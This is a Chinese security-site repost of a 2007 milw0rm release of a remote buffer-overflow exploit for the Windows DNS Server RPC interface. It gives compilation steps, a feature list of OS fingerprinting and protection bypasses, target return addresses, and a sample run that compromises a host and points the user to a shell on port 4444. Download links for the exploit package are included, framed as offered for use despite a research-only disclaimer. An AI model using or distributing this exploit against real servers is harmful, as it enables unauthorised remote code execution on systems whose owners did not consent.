MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2 's

admin
admin
admin
139627
文章
114
评论
2017年5月4日01:29:22评论370 views字数 2045阅读6分49秒阅读模式
摘要

鬼仔注:V2
看到有朋友留言说不知道怎么编译,这里说下用VC里用Makefile文件编译的方法:
运行cmd.exe
进到vc/bin目录
运行vc-vars32.bat
进到makefile所在的目录
nmake /f makefile

鬼仔注:V2
看到有朋友留言说不知道怎么编译,这里说下用VC里用Makefile文件编译的方法:
运行cmd.exe
进到vc/bin目录
运行vc-vars32.bat
进到makefile所在的目录
nmake /f makefile

来源:milw0rm

Exploit v2 features:
– Target Remote port 445 (by default but requires auth)
– Manual target for dynamic tcp port (without auth)
– Automatic search for dynamic dns rpc port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 server and Windows 2003 server (Spanish) supported by default
– Fixed bug with Windows 2003 Shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
– Microsoft RPC api used ( who cares? :p )

D:/Programaci?3n/DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service

D:/Programaci?3n/DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to [email protected]_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444

also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

# milw0rm.com [2007-04-18]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月4日01:29:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2 'shttps://cn-sec.com/archives/49680.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息